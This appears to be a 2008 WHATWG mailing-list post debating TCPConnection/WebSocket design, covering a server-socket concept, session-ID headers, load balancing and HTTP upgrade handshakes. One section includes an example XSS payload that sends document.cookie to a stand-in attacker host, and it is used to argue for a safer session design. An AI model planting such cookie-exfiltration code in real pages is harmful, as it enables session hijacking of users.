[whatwg] TCPConnection feedback

Frode Børli frode at seria.no
Thu Jun 19 16:59:53 PDT 2008


>> I think we should have both a pure TCPSocket, and also a ServerSocket
>> that keeps the same connection as the original document was downloaded
>> from. The ServerSocket will make it very easy for web developers to
>> work with, since the ServerSocket object will be available both from
>> the server side and the client side while the page is being generated.
>> I am posting a separate proposal that describes my idea soon.
>
> I don't see the benefit of making sure that its the same connection that the
> page was "generated" from.

It does not have to be exactly the same connection, but I think it
should be handled by the web server, because then there is no need to
think about transferring state information between, for example, a PHP
script and a WebSocketServer. It would be almost like creating a
desktop application, simply because it would be easy for
web developers. Sample PHP script:

There is probably a better approach to implementing this in PHP, but
it is just a concept:
----
   <input id='test' type='button'>
   <script type='text/javascript'>
      // when the button is clicked, raise the test_click event
      // handler on the server
      document.getElementById('test').addEventListener('click',
          document.serverSocket.createEventHandler('test_click'));
      // when the server raises the "message" event, alert the message
      document.serverSocket.addEventListener('message', alert);
   </script>
<?php
// magic PHP method that is called whenever a client side event
// is sent to the server
function __serverSocketEvent($name, $event)
{
    if ($name == 'test_click')
        server_socket_event("message", "You clicked the button");
}
?>
----

>  If you establish a Connection: Keep-Alive with the proxy server, it will
> leave the connection open to you, but that doesn't mean that it will leave
> the connection open to the back end server as the Connection header is a
> single-hop header.

So it is not possible at all? Are there no mechanisms in HTTP and
proxy servers that facilitate keeping the connection alive all the
way through to the web server?


If a Session ID (or perhaps a Request ID) is added to the headers,
then it is possible to create server side logic that makes things
easier for web developers. When session ids are sent through cookies,
web servers and proxy servers have no way to identify a session (since
only the script knows which cookie holds the session id). The
SessionID header could be used by load balancers and more, and it
could also be used by for example IIS/Apache to connect a secondary
socket to the script that created the page (ultimately achieving what
I want).
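
As a sketch, a request carrying such headers might look like this
(the header names and values are invented for illustration; nothing
here is specified anywhere):

```
GET /page HTTP/1.1
Host: example.com
Session-ID: 2b0c4f9e71d84a5b
Request-ID: 00017
```

A balancer or front-end server could then pair connections by the
Session-ID value alone, without knowing anything about the
application's cookie layout.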

>> The script on the server decides if the connection should be closed or
>> kept open. (Protection against DDOS attacks)
> With the proposed spec, the server can close the connection at any point.
I stated it as a benefit in the context of the web server handling the
requests. An image would close the connection immediately, but a
script could decide to keep it open. All servers can of course close
any connection at any time.

>> This allows implementing server side listening to client side events,
>> and vice versa. If this works, then the XMLHttpRequest object could be
>> updated to allow two way communications in exactly the same way.
>
> The previously proposed protocol already allows the server side listening to
> client side events, and vice versa. Rather or not to put that in the
> XMLHttpRequest interface is another issue. I think making XHR bi-directional
> is a bad idea because its confusing. Better to use a brand new api, like
> WebSocket.

If the implementation works as I tried to exemplify in the PHP script
above (a document.serverSocket object is available), then the XHR
object should also have a .serverSocket object.

document.serverSocket.addEventListener(...)
xhr.serverSocket.addEventListener(...)

I am sure this can be achieved regardless of the protocol.
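
As a minimal sketch of that shared interface (every name here is
hypothetical, since no spec defines a serverSocket object), the same
listener API could back both document.serverSocket and
xhr.serverSocket:

```javascript
// Hypothetical sketch: one ServerSocket interface that both
// document.serverSocket and xhr.serverSocket could implement.
function ServerSocket() {
    this.listeners = {};
}
ServerSocket.prototype.addEventListener = function (name, handler) {
    (this.listeners[name] = this.listeners[name] || []).push(handler);
};
// Called by the browser when a server-side event arrives.
ServerSocket.prototype.dispatch = function (name, data) {
    (this.listeners[name] || []).forEach(function (h) { h(data); });
};

// Both objects expose exactly the same API:
var documentSocket = new ServerSocket();
var xhrSocket = new ServerSocket();
documentSocket.addEventListener('message', function (msg) {
    console.log('page socket:', msg);
});
```

The point is only that the protocol underneath does not matter to the
script author; the listener interface is identical in both places.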

>> Also, by adding a SessionID header sent from the client (instead of
>> storing session ids in cookies), the web server could transparently
>> rematch any client with its corresponding server side process in case
>> of disconnect.
> Isn't that what cookies are supposed to do?  Regardless, it sounds like an
> application-level concern that should be layered on top of the protocol.

One important advantage is that document.cookie can be used for
hijacking sessions, by sending the cookie through for example an
img tag. If JavaScript can't access the SessionID, then sessions can't
be hijacked through XSS attacks.
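
The attack in question is trivial; an injected script only has to
build an image URL carrying the cookie (the attacker domain below is
a made-up placeholder):

```javascript
// Classic XSS cookie theft: build an image URL that smuggles the
// cookie string out to an attacker-controlled host.
function buildExfilUrl(cookie) {
    // 'evil.example' stands in for the attacker's server
    return 'http://evil.example/steal?c=' + encodeURIComponent(cookie);
}

// In a browser, the injected payload would simply be:
//   new Image().src = buildExfilUrl(document.cookie);
// If the session id lives in a header that script cannot read,
// there is nothing for this payload to exfiltrate.
```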

Also, I think load balancers, web servers and other applications
that do not have intimate knowledge of the web application should
be able to pair WebSocket connections with the actual HTTP request.
How else can load balancers be built if they have to route
both pages and WebSockets to the same web server? The load balancer
does not know which part of the cookie identifies the session.
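
To sketch the idea (the header name and the hashing scheme are my
assumptions, not part of any spec): a balancer that routes on an
explicit SessionID header needs no application knowledge at all.

```javascript
// Hypothetical balancer: choose a backend purely from a SessionID
// header value, so pages and WebSocket upgrades belonging to one
// session always land on the same server.
function pickBackend(sessionId, backends) {
    // simple deterministic string hash of the session id
    var hash = 0;
    for (var i = 0; i < sessionId.length; i++) {
        hash = (hash * 31 + sessionId.charCodeAt(i)) >>> 0;
    }
    return backends[hash % backends.length];
}

var backends = ['10.0.0.1', '10.0.0.2', '10.0.0.3'];
// The same session id always maps to the same backend:
var first = pickBackend('2b0c4f9e', backends);
var second = pickBackend('2b0c4f9e', backends);
// first === second
```

With cookies, the balancer would instead have to be configured with
application-specific knowledge of which cookie holds the session id.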

I am sure that some clever people will find other uses if the session
id and request id are available for each request made from a script.

>> The HTTP spec has these features already:
>>
>> 1: Header: Connection: Keep-Alive
>> 2: Status: HTTP 101 Switching Protocol
>>
>> No need to rewrite the HTTP spec at all probably.
> You can't use HTTP 101 Switching Protocols without a Connection: Upgrade
> header. I think you'll note that the proposal that started this thread uses
> just this combination.

The HTTP 101 Switching Protocols response can be sent by the server
without the client asking for a protocol change. The only requirement
is that the server sends 426 Upgrade Required first, then specifies
which protocol to switch to. The protocol switched to could possibly
be the one proposed at the beginning of this thread.

The new protocol should be based on this:
http://tools.ietf.org/id/draft-burdis-http-sasl-00.txt

It is essentially the same, except that we are upgrading to a two-way
protocol instead of an HTTPS protocol.
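
Under that 426-then-upgrade flow, the exchange might look roughly like
this (the protocol token is invented for illustration):

```
C: GET /page HTTP/1.1
C: Host: example.com

S: HTTP/1.1 426 Upgrade Required
S: Upgrade: x-two-way/1.0
S: Connection: Upgrade

C: GET /page HTTP/1.1
C: Host: example.com
C: Upgrade: x-two-way/1.0
C: Connection: Upgrade

S: HTTP/1.1 101 Switching Protocols
S: Upgrade: x-two-way/1.0
S: Connection: Upgrade
```

After the 101, both ends speak the new two-way protocol on the same
TCP connection.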

>> TCPConnections are only allowed to the server where the script was
>> downloaded from (same as Flash and Java applets). A DNS TXT record can
>> create a white list of servers whose scripts can connect. Also the
>> TCPConnection possibly should be allowed to connect to local network
>> resources, after a security warning - but only if the server has a
>> proper HTTPS certificate.
> How would a DNS TXT record solve the problem? I  could register evil.com and
> point it at an arbitrary ip address and claim that anyone who wants to can
> connect.

Doh, of course! :) So I am going back to my first suggestion: the
server hosting the script must have a certificate as well. The script
must be signed with a private key, and the DNS server must publish
the public key.

>> With the security measures I suggest above, there is no need for
>> protection against brute force attacks. Most developers only use one
>> server per site, and those that have multiple servers will certainly
>> be able to add a TXT-record to the DNS.
> I don't actually understand which part of the specification you want to
> change aside from doing the access control in a DNS TXT record instead of
> the protocol.

I care more about how it works for the developer than how the protocol
itself is implemented. I think maybe the protocol should be discussed
with others or have its own WG.

Summarizing what I want as a web developer:

The script that generates the page should be able to communicate with
the page it generated. The page should also be able to connect to a
separate script, if the web developer thinks that it is important.

Reasons:

1. Simplicity for developers.
2. No need to propagate state information between applications that
handle sockets and applications that generate the page.
3. It is more similar to a standard desktop application.
4. Resources opened by the script that created the page can be kept
open (file locking etc.).


